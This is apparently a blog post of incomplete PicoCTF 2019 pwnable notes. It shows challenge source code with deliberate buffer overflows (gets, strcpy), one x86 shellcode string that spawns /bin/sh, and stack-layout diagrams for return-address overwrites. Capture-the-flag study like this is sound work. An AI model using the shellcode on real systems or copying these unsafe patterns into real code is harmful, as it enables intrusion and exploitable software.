PicoCTF2019 ###

###General skills

### PWNABLE

##handy-shellcode

1.description

$clues

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){setvbuf(stdout, NULL, _IONBF, 0);

// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];puts(“Enter your shellcode:”);
vuln(buf);
puts(“Thanks! Executing now…”);

((void (*)())buf)();
puts(“Finishing Executing Shellcode. Exiting now…”);

return 0;
}
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

##practice-run-1

##OverFlow 0

1.description

  • Find a way to trigger the flag to print
  • If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren’t expecting.

2.Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64char flag[FLAGSIZE_MAX];void sigsegv_handler(int sig) {
fprintf(stderr, “%s\n”, flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[128];
strcpy(buf, input);
}
int main(int argc, char **argv){

FILE *f = fopen(“flag.txt”,”r”);
if (f == NULL) {
printf(“Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n”);
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler);

gid_t gid = getegid();
setresgid(gid, gid, gid);

if (argc > 1) {
vuln(argv[1]);
printf(“You entered: %s”, argv[1]);
}
else
printf(“Please enter an argument next time\n”);
return 0;
}

###OverFlow 1

1.Description

  • Take control that return address
  • Make sure your address is in Little Endian.

2. Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
printf("Woah, were jumping to 0x%x !\n", get_return_address());
}
int main(int argc, char **argv){setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Give me a string and lets see what happens: ");
vuln();
return 0;
}
+------------------------------+
| |
| return address |
| |
+------------------------------+
| |
| base address |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
+------------------------------+
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
+------------------------------+

###NewOverFlow 1,2

###slippery-shellcode

1. Description

2.Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 512
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){setvbuf(stdout, NULL, _IONBF, 0);// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];puts(“Enter your shellcode:”);
vuln(buf);
puts(“Thanks! Executing from a random location now…”);int offset = (rand() % 256) + 1;((void (*)())(buf+offset))();puts(“Finishing Executing Shellcode. Exiting now…”);return 0;
}

###OverFlow 2

1.Description

2.solution

+---------------------------------+
|.................................|
+---------------------------------+
| |
| return address of vuln |
| |
+---------------------------------+
| |
| overflowed buf |
| |
+---------------------------------+
|.................................|
+---------------------------------+
===================================
===================================
+---------------------------------+
|.................................|
+---------------------------------+
| |
| arg2 | push arg2
| |
+---------------------------------+
| |
| arg1 | push arg1
| |
+---------------------------------+
| |
| return address of flag | push the next eip (scrap)
| |
+---------------------------------+
| base address |
| |
+---------------------------------+
  • push các giá trị được truyền theo chiều ngược lại
  • push vào ret address của instruction kế tiếp để lúc trở về có thể tiếp tục được flow của chương trình

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nguyễn Tín

Nguyễn Tín

a loner

More from Medium

The Art Of Meditation

3 Reasons Why NEAR Protocol is Performing Well This Week

Amma, Bakshanam and Me

Under The African Sun (Part 1): Cape and Wine